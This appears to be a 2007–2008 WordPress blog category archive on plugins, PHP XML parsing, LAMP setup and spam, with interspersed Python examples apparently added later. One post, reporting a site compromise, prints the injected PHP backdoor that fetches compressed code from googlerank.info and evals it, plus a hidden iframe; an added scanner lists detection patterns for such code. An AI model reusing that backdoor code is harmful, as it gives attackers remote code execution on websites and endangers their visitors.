Archive for the ‘WordPress’ Category

Parsing XML with PHP

17 Nov 2008 19:55 by Rick

Following on from the last.fm saga described earlier, I went on to look at the method user.GetWeeklyAlbumChart which requires accessing user.GetWeeklyChartList first.

I am using the plugin iLast.Fm from Leandro Alonso and the code he is using looks right but doesn’t seem to work. He uses curl to get the XML from the last.fm site. The XML you get is of the form

<lfm status="ok">
<weeklychartlist user="[username]">
<chart from="1225022400" to="1225627200"/>
<chart from="1225627200" to="1226232000"/>
<chart from="1226232000" to="1226836800"/>
</weeklychartlist>
</lfm>

He then parses it with simplexml_load_file() and puts it into an object called $chart. Then the code processes this as follows

$chartopt = sizeof($chart->weeklychartlist->chart) - 1; // intended: index of the last <chart> in the list
$chart = $chart->weeklychartlist->chart[$chartopt];     // the most recent weekly window

and uses $chart['from'] and $chart['to'] in the call to user.GetWeeklyAlbumChart.

The problem is that $chartopt always has the value 0, i.e. sizeof() is returning 1 for the list of <chart> elements no matter how many there are. There is a comment on the PHP documentation page which says that foreach doesn’t work but recommends count()/sizeof() instead. What can be wrong?

Update: The answer seems to be here: SimpleXML is not so simple. Before PHP 5.3 a SimpleXMLElement did not implement count(), so sizeof() on the element list returns 1 however many <chart> elements there are; SimpleXMLElement::count() only arrived in PHP 5.3. On the PHP of the day it needs

$chartopt = -1;
foreach($chart->weeklychartlist->chart as $i) $chartopt++; // walk the list and count; ends on the index of the last <chart>
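As an added example (not code from the iLast.Fm plugin or from this post), here is the same chart list parsed in Python, picking the latest window and refusing anything that does not look like an "ok" response. The sample document is the response shape quoted above with a made-up username; the DOCTYPE check is an assumption that a genuine API response never carries one.

```python
"""Added example: parse a last.fm weeklychartlist response and pick the
latest chart window. Illustrative code, not the iLast.Fm plugin."""
import xml.etree.ElementTree as ET

# Constructed sample, shaped like the response quoted in the post.
SAMPLE_XML = """<lfm status="ok">
<weeklychartlist user="someuser">
<chart from="1225022400" to="1225627200"/>
<chart from="1225627200" to="1226232000"/>
<chart from="1226232000" to="1226836800"/>
</weeklychartlist>
</lfm>"""


def chart_windows(xml_text):
    """Return the (from, to) integer pairs of every <chart> in document order.

    Raises ValueError on anything that is not an 'ok' response or that has an
    inconsistent window, so an error document can't pass as an empty list.
    """
    if "<!DOCTYPE" in xml_text:
        # Assumption: the API response has no DTD, so refuse inputs that carry
        # one rather than let any entity expansion be attempted.
        raise ValueError("unexpected DOCTYPE in API response")
    root = ET.fromstring(xml_text)
    if root.tag != "lfm" or root.get("status") != "ok":
        raise ValueError("not an ok <lfm> response")
    windows = []
    for chart in root.iterfind("./weeklychartlist/chart"):
        start = int(chart.get("from", ""))   # ValueError if missing or junk
        end = int(chart.get("to", ""))
        if end <= start:
            raise ValueError("chart window with to <= from")
        windows.append((start, end))
    return windows


def latest_window(xml_text):
    """The pair the plugin needs for user.GetWeeklyAlbumChart: the last <chart>.
    Returns None when the list is empty instead of indexing past the end."""
    windows = chart_windows(xml_text)
    return windows[-1] if windows else None
```

Counting the parsed list directly sidesteps the sizeof() problem; the empty-list case returns None rather than the index -1 that the PHP workaround would produce.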

WordPress Event Plugins

23 Oct 2008 13:45 by Rick

Looking for plugins for WordPress (or probably any other package) is very frustrating. First you have to search the directory (which, I agree, is a big improvement on what it used to be) and sift out the possible from the unlikely. Then look at the descriptions, which are often completely inadequate, and test the promising candidates.

[Upcoming Services]

I have been looking for an Event system for the church web site—one that allows you to post-date items and list upcoming events, particularly services. There are a number based around iCal and Google Calendar but I didn’t want to get into that level of complexity and, anyway, a calendar based presentation is not as direct and immediate as we wanted. Eventually I narrowed it down to two: WP Events and RS Event. Another one which looks promising (but complex) is Events Category but I haven’t had time to look at it [Update below].

WP-Events

Pro—Actively maintained and developed by the author (Arnan de Gans).
Supports start and end dates and times, multi- and all-day events.
Provides sidebar widget and main page hooks for upcoming events and archives plus function calls for experts.
Allows different categories for events.
Incorporates Event Location. This is not something that we would use, preferring to put this sort of information into the description.
The dedicated admin page (Manage Events) has full information about each item.
Allows HTML tags in sidebar for images and markup.
Very flexible configuration.
Simple implementation so easy to hack.

Con—Uses a separate database table for events so they are not found by the search engine.
Excerpting is done by character count rather than word which can break HTML.
Non-standard interface for creating events which is not foolproof for the non-geek e.g. no implicit tags and validation.
Events cannot be in more than one category and they bear no relation to WP post categories.
There is no single event display without creating a separate WP post and linking to it.
The More link appears even if there is no more.

RS-Event

Pro—Uses extra metadata on standard posts to indicate start date/time. Hence search and ordinary posts listings work.
Provides sidebar widget and function call for experts.
Allows different (standard WP post) categories for events.
Events can be put into multiple categories
Very easy to use, suitable for admin staff.
Simple implementation so easy to hack.

Con—the author (Robert Sargant) has vanished so it is no longer supported, though a working version patched for current WordPress can be found at LivingOS. A hacked version exists with some extra features by Nudnik.
Uses standard (rather inflexible) WP excerpting which doesn’t allow markup.
You can’t tell from the admin pages (Manage Posts) the date of each event.
There is no recording of end date/times so no concept of an event duration or multi- and all-day events.
Non-widget configuration has to be done by editing the theme files making the theme site specific (because it refers to categories explicitly by ID).
Requires an unpublished hack to get event date/time to appear in archives, search listings and single post pages.
The More link appears even if there is no more.

I have included both in my demonstrator so the user can choose. I think they will go for the second as it is easier for them to use—the extra work has already been put in by me.

[Update 24 Oct 2008]

Events Category

Something that has saved a great deal of effort is that the author of Events Category (Weston Ruter) has provided an excellent write-up. Reading this I can at least superficially evaluate it without having to download and test it.

Pro—The aforementioned write-up, and I think it is maintained, though there is a suggestion that it does not work with WordPress 2.5+.
Uses extra metadata on standard posts. Hence search and ordinary posts listings work. In addition, the output method uses the WordPress loop with additional template tags so customising it is flexible and straightforward.
Supports start and end dates and times and hence multi-day events.
Events can be put into multiple categories
Allows multiple sidebar widgets and plenty of scope for theme writers.
The start date of an event is easy to see from the Manage Posts admin panel (because it is the post date).
Easy to use, suitable for admin staff.
Incorporates a comprehensive Event Location and integrates with various calendar systems.

Con—The start date of an event uses a forward dated post which loses some information, though the update tracking in current WordPress provides this information for audit.
Looking at the (well described) method of operation it is probably fairly complex, modifying deep parts of WordPress, and hence hard to hack. I am not sure I could get it to work with current WP.

From that analysis I don’t think we will be using it but there are some great ideas there that I may adapt for use with whichever system we do go with. One thing the exercise has demonstrated is how many different ways you can use to achieve the same objective.

Code Comments

28 Sep 2008 18:01 by Rick

Putting comments in code is a well-established, if not rigidly employed, method of documenting what the thing does. At best it tells future maintainers how it works and at worst it reminds you when you come back to it later. It doesn’t do anything else. With WordPress it does!

I wanted to make one page in a blog type application look different. The WordPress documentation says that first it looks for a template called pagename.php

Any custom Page Template selected for the page – If the page slug were about, WordPress would look for about.php

failing that then one called page.php and finally index.php working down the hierarchy until it finds one that exists. Now you would think that “pagename” was the name of the page—wrong!

After rootling through the forums I discovered that you have to select a custom “Page Template” on the write/manage page admin panel, THEN it directs it to use the right one.

Looking at the panel—no sign of a “Page Template” menu as promised. Further deep hunting on the forum and even resorting to Google I discover that you have to declare your custom templates—by adding a comment to the beginning in the form

<?php
/*
Template Name: templatename
*/
?>

Now the menu appears and you can choose between “Default Template” or the one you have declared, “templatename”. That is what I meant. These are not comments, even if they look like comments, because the theme integration code is reading and interpreting them. They are effectively executed. I wonder if that is true for any others?
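To show that such a header is read as data rather than skipped as a comment, here is an added example, not WordPress's own code, that reproduces the way WordPress's get_file_data() pulls a header out of a file: only the first 8 KiB is inspected, the key is matched case-insensitively at the start of a line after any comment characters, and a trailing */ or ?> is discarded. The same kind of header is how a plugin's Plugin Name: line and a theme's Theme Name: line in style.css are read, so the answer to the question above is yes. The three sample files and the page_templates() helper are constructed for the example.

```python
"""Added example: how a WordPress-style file header is extracted from what
looks like a comment. Mirrors get_file_data(): first 8 KiB only, key matched
at line start after comment characters, trailing */ or ?> dropped.
Illustrative code, not WordPress's own."""
import re

HEADER_BYTES = 8192  # WordPress reads only this much of the file


def file_header(source, key):
    """Return the value of `key:` from the file header, or None if absent."""
    head = source[:HEADER_BYTES].replace("\r", "\n")
    pattern = re.compile(
        r"^[ \t/*#@]*" + re.escape(key) + r":(.*)$",
        re.MULTILINE | re.IGNORECASE,
    )
    m = pattern.search(head)
    if not m:
        return None
    # Drop anything from a closing */ or ?> onwards, then trim.
    value = re.sub(r"\s*(?:\*/|\?>).*", "", m.group(1))
    return value.strip()


# Constructed theme file, like the one in the post.
TEMPLATE_PHP = """<?php
/*
Template Name: templatename
*/
?>
<h1>Custom page</h1>
"""

# A '#' comment with different capitalisation and a stray */ is accepted too.
LOOSE_PHP = "<?php\n# template name: Other Template */\n?>\n"

# The key is also picked up when it merely starts a line inside a string
# literal: the matcher knows nothing about PHP syntax, only about lines.
STRING_PHP = '<?php\n$sql = "\nTemplate Name: Sneaky\n";\n'


def page_templates(files):
    """Map template name -> file name for every file declaring one, which is
    how the Page Template drop-down gets populated."""
    found = {}
    for name, source in files.items():
        title = file_header(source, "Template Name")
        if title:
            found[title] = name
    return found
```

The third sample is the practical caveat: any theme file whose first 8 KiB has a line beginning with Template Name: registers a page template, whatever the surrounding PHP meant by it.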

Colour Management

24 Jun 2008 20:37 by Rick

To those who look carefully, photographs on web pages look dull compared to how they look in photo editors. I always thought it was due to the low resolution but apparently it is all about Colour Management Profiles. These are instructions placed in the image file which tell the receiver how to render the colours and are intended to allow matching on different devices—e.g. Screens on different computers, projectors and printers. However, Firefox has always ignored them; until Firefox 3. IE ignores them as well; Safari does read them but in a different way.

In Firefox, if you go to the about:config page and set gfx.color_management.enabled to True then, after a restart, it will be activated. All the photographs will look just a little bit richer, brighter and more sparkling. The photo purists are wondering why it has not been enabled by default.

Well if you have tried it in Windows you will see—everything else will have taken on a different tinge compared to what it was before, mine went pinkish, others have reported a cream bias. The greys are no longer neutral because in the process of doing it to photographs that come with built-in profiles, they have applied a default profile to everything else on the page and it all looks wrong. The official Mozilla page says that it relies on a properly calibrated monitor. Well mine is as close as I can get it without special hardware but that is not the answer. What you also need to do is set the default profile gfx.color_management.display_profile. You would expect this to be the actual values for your monitor, but that is what Firefox is already doing. What you need to do is set it to C:\WINDOWS\system32\spool\drivers\color\sRGB Color Space Profile.icm to stop Firefox altering it and allow the Windows display driver to make the correction for the screen. Brad Carlile has a good test page—if the greys still look grey and his three test pictures all look the same then you have got it right. The Apple Mac doesn’t seem to have a problem, just set the enabled flag to True and it mostly works. Safari (at least on the Mac) does it like this by default.

Secondly, plugins, particularly Flash, do not compensate, so sites that blend from backgrounds to Flash will no longer be seamless—but my fix seems to solve that as well, unless they are trying to blend Flash with JPG which would be unusual. I haven’t got this working for the Mac yet; and, although Flash blending is ok, apparently Safari falls down for a similar reason: the CSS and GIF backgrounds don’t blend seamlessly with JPG and PNG images. This may also affect my fix but I haven’t had a chance to experiment with it yet. What I need is another comprehensive test page. Update: It is a heavy read, but this page by G. Ballard explains it all and has a lot of test pictures, or this excellent article by Jeffrey Friedl.

Finally, it also takes 10–15% more processor power to render the pictures so those on older systems will see a noticeable slow down on picture heavy sites.

I first thought that I would be switching it off again until they get this sorted out properly, but having found the profile hack I will leave it; I don’t care about Flash anyway.

User profiles in WordPress

20 May 2008 11:30 by Rick

For some time I have been having problems with registered users. Not the dozen or so users that I know about who either contribute to the site or are left over from the days when I insisted on registration before commenting. No, these are ones where “people” have found the registration page, created a profile but I have never heard from them since. I have been looking for a way to clear them out, which is not easy because I have no way to tell if they have actually commented using that profile and if I delete those, then the comments disappear with them. I have been looking around for a plugin to help and in the meantime I have been deleting ones with email addresses in Russia, Bulgaria and Poland—it is not xenophobia, just that I know that there is a 99% chance that they are spammers.

One possible plugin that I have tried is loginlogger. This keeps a track of when people have logged in. I was hoping it did a bit more but even that has been fascinating. Apart from my own connection, which I know about, I had well over 100 failed logins over a 2 hour period last night, and the usernames were quite repetitive; brutal2008, Reiki, kazikr, broker1980, watroba50, smiglidigli, bombastik2008, etc. occur quite often. These names don’t appear in my roster (but they may have once and I have deleted them, I don’t keep track) but doing a Google search on them reveals a common pattern; most hits are either on SEO sites or are Polish or Russian sites or in those languages.

So my policy seems to be justified—that is where the spammers are. To avoid the problem in the future I could have disabled registration altogether. It isn’t used a lot, but I like to give regular commenters the option of having their profile stored if they want to. So what I have done is install the Sabre plugin. This is a very flexible registration control system with options for CAPTCHA, arithmetic tests, email confirmation and other validation techniques. I am hoping that with minimal effort I can foil the majority of automatic bot registrations.
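The pattern in that login log, many failures in a short burst from one source against names that are not on the roster, is what a brute-force detector keys on. The following is an added example, not code from loginlogger, Sabre or WordPress: the line format is made up for the example (it is not loginlogger's real table layout), the usernames are the ones quoted above, and the addresses and times are constructed.

```python
"""Added example: pick a password-guessing run out of a login log.
Line format, addresses and times are constructed; not loginlogger's code."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample lines: "date time result username source-ip"
LOG_LINES = """\
2008-05-19 21:02:11 OK rick 198.51.100.4
2008-05-19 22:10:03 FAIL brutal2008 203.0.113.7
2008-05-19 22:10:05 FAIL Reiki 203.0.113.7
2008-05-19 22:10:09 FAIL kazikr 203.0.113.7
2008-05-19 22:10:14 FAIL broker1980 203.0.113.7
2008-05-19 22:10:20 FAIL watroba50 203.0.113.7
2008-05-19 22:10:27 FAIL smiglidigli 203.0.113.7
2008-05-19 22:10:33 FAIL bombastik2008 203.0.113.7
2008-05-19 22:11:01 FAIL brutal2008 203.0.113.7
2008-05-19 22:11:08 FAIL Reiki 203.0.113.7
2008-05-19 22:11:15 FAIL kazikr 203.0.113.7
2008-05-19 22:40:00 FAIL rick 198.51.100.4
2008-05-19 22:40:20 OK rick 198.51.100.4
""".splitlines()

# Accounts that really exist on the blog (an assumption for the example).
KNOWN_USERS = {"rick"}


def parse(line):
    """Split one log line into (timestamp, result, username, source ip)."""
    date, time, result, user, ip = line.split()
    return datetime.strptime(date + " " + time, "%Y-%m-%d %H:%M:%S"), result, user, ip


def most_tried(lines):
    """How often each username failed to log in across the whole log."""
    return Counter(user for _when, result, user, _ip in map(parse, lines)
                   if result == "FAIL")


def failed_login_report(lines, window=timedelta(hours=2), threshold=5):
    """For every source address with more than `threshold` failures inside any
    `window`, return its worst burst and the usernames it tried that are not
    on the roster (names nobody could legitimately be logging in as)."""
    failures = defaultdict(list)
    tried = defaultdict(set)
    for when, result, user, ip in map(parse, lines):
        if result != "FAIL":
            continue
        failures[ip].append(when)
        tried[ip].add(user)

    report = {}
    for ip, times in failures.items():
        times.sort()
        start, worst = 0, 0
        for end, t in enumerate(times):          # sliding window over sorted times
            while t - times[start] > window:
                start += 1
            worst = max(worst, end - start + 1)
        if worst > threshold:
            report[ip] = {"failures": worst,
                          "unknown_users": sorted(tried[ip] - KNOWN_USERS)}
    return report
```

With this sample the only source flagged is 203.0.113.7, ten failures inside a minute, every one against a name that is not on the roster; the single mistyped password from the owner's own address stays below the threshold. The roster comparison is the useful half: a guesser cycling through harvested names gives itself away by never hitting a real account.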

Installing LAMP on Ubuntu 7.10 Desktop

2 May 2008 14:22 by Rick

Doing a search with those keywords reveals a number of guides but most are now either old, incomplete or refer to the Ubuntu Server Build which has most of it pre-installed. My requirement was to put Linux (Ubuntu), Apache (web server), MySQL (database) and PHP (programming language) onto an existing desktop build (under VMware Fusion on a Mac) to serve as a WordPress development test-bed to save me having to keep uploading to a sandpit region on my web host.

The references used to achieve (and write) this were LAMP Installation On Ubuntu, Installing LAMP on Ubuntu 7.10 and Installing and configuring LAMP on Ubuntu.

The process will mostly be done in a terminal (shell) window and a browser. The latter can be on a separate system on your network, in which case substitute the Ubuntu IP address for “localhost” in the instructions below.

sudo apt-get install apache2
Change the ownership of the web area using
sudo chown -R [your Ubuntu account] /var/www
and test it by pointing a browser at http://localhost/

sudo apt-get install php5 libapache2-mod-php5
Restart Apache (sudo /etc/init.d/apache2 restart), create a file /var/www/phpinfo.php containing the line <?php phpinfo(); ?> and test from the browser (http://localhost/phpinfo.php).

sudo apt-get install mysql-server mysql-client
sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin
During this process you should be asked to set the MySQL root password. It is very important: choose it carefully and keep it, as it is needed again below.

Edit /etc/php5/apache2/php.ini and insert the line extension=mysql.so (watch the spelling, the comment in the file is wrong) so that PHP can see MySQL. Also Apache needs to be told where phpmyadmin is, so edit /etc/apache2/apache2.conf and add the line
Include /etc/phpmyadmin/apache.conf
Restart apache again and test by going to phpmyadmin (http://localhost/phpmyadmin/). The login is root and the MySQL root password (I think).

My immediate requirement was to use it for WordPress. Although you can download a WordPress package using apt-get, I found that this was rather out of date so I did it manually. You will need a database so login to phpmyadmin, create a database by entering the name (e.g. WordPressDB) in the box and click the create button. Now click the SQL button and execute the following command where WordPressDB, WPDBaccount and WPDBaccountPW are your choices.
GRANT ALL ON WordPressDB.* TO WPDBaccount@localhost IDENTIFIED BY 'WPDBaccountPW';

Now in the WordPress directory (say /var/www/wordpress) copy the wp-config-sample.php file to wp-config.php and edit it thus

// ** MySQL settings ** //
define('DB_NAME', 'WordPressDB');
define('DB_USER', 'WPDBaccount');
define('DB_PASSWORD', 'WPDBaccountPW');

Now finish the install by surfing to http://localhost/wordpress/wp-admin/install.php
It will give you a WordPress admin password on the way.

That is it—the only problems I found were keeping track of which password was which and went where.

By the way, it is only for use on your home network, there are other things you will need to do if you are planning to set it up as a real internet visible server.

WordPress update 2.3.3

6 Feb 2008 23:20 by Rick

This came out yesterday as an emergency patch for a vulnerability. I wouldn’t normally write about it here but, for some reason, they didn’t publish the list of changed files. So here they are:—

xmlrpc.php
wp-content\plugins\akismet.php
wp-admin\install-helper.php
wp-includes\version.php
wp-includes\gettext.php
wp-includes\pluggable.php

It is the first one that is important.
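A list like this can be produced, or checked against your own install, by hashing the files of the two release trees rather than looking at file dates. The following is an added example, not WordPress's own tooling: it walks two directory trees, hashes every file with SHA-256 and reports what was modified, added or removed. The two trees built by demo() are stand-ins with made-up contents; only the file names come from the list above.

```python
"""Added example: diff two release trees by content hash.
Illustrative code, not WordPress's tooling; the trees are constructed."""
import hashlib
import os
import tempfile


def tree_hashes(root):
    """Map relative path -> SHA-256 of content for every file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = digest
    return manifest


def diff_manifests(old, new):
    """Return (modified, added, removed) as sorted lists of relative paths."""
    modified = sorted(p for p in old.keys() & new.keys() if old[p] != new[p])
    added = sorted(new.keys() - old.keys())
    removed = sorted(old.keys() - new.keys())
    return modified, added, removed


def _write(root, files):
    """Materialise a {relative path: text} dict under root."""
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def demo():
    """Build stand-in 'old' and 'new' trees (contents made up; file names
    taken from the list in the post) and diff them."""
    old = {
        "xmlrpc.php": "<?php // old xmlrpc\n",
        "wp-includes/version.php": "<?php $wp_version = '2.3.2';\n",
        "wp-includes/pluggable.php": "<?php // unchanged helper\n",
        "index.php": "<?php // front controller\n",
    }
    new = dict(old)
    new["xmlrpc.php"] = "<?php // patched xmlrpc\n"
    new["wp-includes/version.php"] = "<?php $wp_version = '2.3.3';\n"
    with tempfile.TemporaryDirectory() as tmp:
        _write(os.path.join(tmp, "old"), old)
        _write(os.path.join(tmp, "new"), new)
        return diff_manifests(tree_hashes(os.path.join(tmp, "old")),
                              tree_hashes(os.path.join(tmp, "new")))
```

Pointing tree_hashes() at a pristine download and at the live site gives the same three lists for an install, which is also the check to run when a site is suspected of having been tampered with.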

I wuz hacked

16 Nov 2007 11:06 by Rick

Some time recently (at least I hope it was recently) someone has hacked this blog. It was very subtle and I only discovered when a friend said that she could no longer get to even my home page. She uses the McAfee security system and got the message

googlerank.info/counter may cause a breach of browser security.

*Why were you redirected to this page?* When we tested, this site attempted to make unauthorized changes to our test PC by exploiting a browser security vulnerability. This is a serious security threat which could lead to an infection of your PC.

The McAfee information page had more details. I had a hunt around and couldn’t see any mention of this googlerank.info site and no iframes and was beginning to think it was a false alarm. But looking at the page source of the front blog page via the view menu in Firefox, I spotted a small line of code apparently advertising a DVD download site. I can’t show it to you now because I forgot to save a copy but it was rather odd. It was designed not to display (using CSS) so must have been there only for the search engine linking credit; also, it made no mention of the googlerank.info site. It was just before the footer code and didn’t appear on any other blog pages so I was drawn to my theme index.php page and, sure enough, between <?php get_sidebar(); ?> and <?php get_footer(); ?> was the offending line of code. Checking over the rest of the file I found another piece immediately after the initial <?php which did mention the offending googlerank.info stuff which was as follows:—

if (isset($_COOKIE['pird']) or isset($_GET['pird'])) {   // only fires for a visitor who presents the 'pird' switch, so normal readers never see it
if (!isset($_COOKIE['pird'])) setcookie('pird', '12313.412',time()+60*60*24*600);   // then remembers that visitor for 600 days
eval(gzuncompress(file_get_contents('http://googlerank.info/soft/faq.compressed')));   // fetches a compressed PHP payload from the remote site and runs it
exit;   // and stops before any of the normal page is produced
}

I am not exactly sure what it does, the file referenced seems to be missing, but I have chopped the code out now. A Google search doesn’t come with any hits for this type of hack.

What is worrying is that I don’t know how they got in. I had a good admin password which I have now changed for an even better one. I should also refresh the theme code from source in case there are other changes that I haven’t seen. I will need to look seriously at updating to the latest WordPress version, or perhaps the problem is file permissions? Or is my hosting service compromised? Also, do I need to tell some database somewhere that I am safe again, McAfee seems to have already white-listed me? I can see that there is no point in these security companies telling deliberately malicious sites that they are blacklisted but it would be useful for those of us who have been unknowingly hacked.

As a result I have a lot more respect for McAfee than I did before, I see they also know that the site is hosted in Canada.

Update: Looking around I found that the main site index.htm was also modified. It had the well known line

<iframe src=http://googlerank.info/counter style=display:none></iframe>

so this is probably what McAfee was seeing. What I still don’t know is how it was done. None of the file or directory protections are bad and the date on the files attacked is the same as the original. I have now refreshed everything so it should be clean but if you don’t know how then it remains a concern.

Update 2: Mtekk’s Crib seems to have found a similar problem.

Update 3: Creative Briefing has experienced a similar problem using WordPress version 2.3.3 (the current one at 13-Mar-2008). This is very worrying.
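Because the injected files kept their original dates, a search for this kind of tampering has to look at content. The following is an added example, not WordPress's or any vendor's scanner: it runs a handful of indicator rules taken from the two snippets quoted above (eval of remotely fetched, compressed code; a remote http:// include; a cookie set for hundreds of days; an iframe hidden with display:none) over a directory of site files and lists the hits. The sample files are constructed in a temporary directory; the injected lines are the ones quoted in the post.

```python
"""Added example: indicator scan for the injection described in the post.
Illustrative code; the scanned files are constructed for the example."""
import os
import re
import tempfile

# Each rule is (name, regex applied to one line at a time).
RULES = [
    ("eval-of-remote-or-decoded-code",
     re.compile(r"eval\s*\(\s*(?:gzuncompress|gzinflate|base64_decode|"
                r"str_rot13|file_get_contents)\s*\(", re.I)),
    ("remote-include-via-http",
     re.compile(r"(?:include|require|file_get_contents)(?:_once)?"
                r"\s*\(\s*['\"]https?://", re.I)),
    # Matches the time()+60*60*24*N form used in the snippet, N >= 100 days.
    ("long-lived-setcookie",
     re.compile(r"setcookie\s*\(.*time\s*\(\s*\)\s*\+\s*60\s*\*\s*60\s*\*"
                r"\s*24\s*\*\s*\d{3,}", re.I)),
    ("hidden-iframe",
     re.compile(r"<iframe[^>]*display\s*:\s*none", re.I)),
]

SCAN_SUFFIXES = (".php", ".htm", ".html", ".js")


def scan_file(path, text):
    """Return [(path, line_number, rule_name)] for every matching line."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((path, number, name))
    return hits


def scan_tree(root):
    """Scan every file with a web-facing suffix under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(SCAN_SUFFIXES):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits.extend(scan_file(rel, fh.read()))
    return hits


# Constructed theme index.php carrying the snippet quoted in the post.
INFECTED_INDEX = """<?php
if (isset($_COOKIE['pird']) or isset($_GET['pird'])) {
if (!isset($_COOKIE['pird'])) setcookie('pird', '12313.412',time()+60*60*24*600);
eval(gzuncompress(file_get_contents('http://googlerank.info/soft/faq.compressed')));
exit;
}
get_header(); ?>
<?php get_sidebar(); ?>
<?php get_footer(); ?>
"""

CLEAN_PAGE = "<?php get_header(); ?>\n<p>Nothing to see here.</p>\n<?php get_footer(); ?>\n"

# Constructed site index.htm with the iframe quoted in the first update.
INFECTED_HOME = ("<html><body>Welcome\n"
                 "<iframe src=http://googlerank.info/counter style=display:none></iframe>\n"
                 "</body></html>\n")


def demo():
    """Write the three sample files into a temp tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "wp-content", "themes", "mytheme"))
        files = {
            "wp-content/themes/mytheme/index.php": INFECTED_INDEX,
            "wp-content/themes/mytheme/page.php": CLEAN_PAGE,
            "index.htm": INFECTED_HOME,
        }
        for rel, content in files.items():
            with open(os.path.join(tmp, rel), "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_tree(tmp)
```

The rules are deliberately narrow: a plain isset($_COOKIE[...]) test is too common in honest code to be worth flagging on its own, whereas eval over a decoder, a remote http:// read and a 600-day cookie are each unusual enough to deserve a look. Hits are leads, not verdicts; the hash comparison against a clean copy of the theme is what confirms the file was changed.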

WordPress Security

7 Nov 2007 12:56 by Rick

BlogSecurity has published a white paper about how to secure your WordPress installation. A lot of the stuff in there is security by obscurity, e.g. changing your database prefix and renaming your admin account, which may slow down intruders, but there is some good stuff in there as well. They also advertise a WordPress Security Scanner which should be worth a test.

Thanks to LiquidMatrix for the nudge.

Akismet Spam Statistics

6 Jul 2007 09:05 by Rick

As my “caught spam” counter rapidly approaches the 100,000 milestone I have noticed that there seems to be a discrepancy. Currently I get between 200 and 300 spam comments a day on this blog. This high figure really kicked in over Christmas last year but I have been using the Akismet anti-spam plugin since the previous May when the problem was significant, but a lot less.

The way Akismet works is that, as each comment arrives, details of it are checked against a central database at Automattic and an opinion is given as to whether it is spam or not. If it thinks it is spam it is put in a separate bucket and doesn’t get displayed; if not it goes for moderation as normal (I am a bit more paranoid than some and every time I consider taking off the moderation, I get a flurry of misses). The spam comments are kept for 15 days unless deleted manually and I have an opportunity to override the decision, though I haven’t seen a single false positive yet.

So every comment that arrives is given a unique number in the blog database, there doesn’t seem to be any way of bypassing that as they are all kept for a period and need to be referenced. As I write the latest spam message has been given number 62,407. This is 150 a day since I started, which seems reasonable. So how do Akismet reckon that they have stopped 99,315 on my behalf, almost 100 a day more?

The faq says

Some versions of the Akismet for WordPress plugin will hide duplicate comments, making it appear to be a different number caught than displayed.

but I can see no evidence of that and I am using the standard issued plugin.

It is not particularly important as there is no doubt that it does a good job, but it would suggest that their web site claim of nearly 2 billion spam blocked is also inflated.
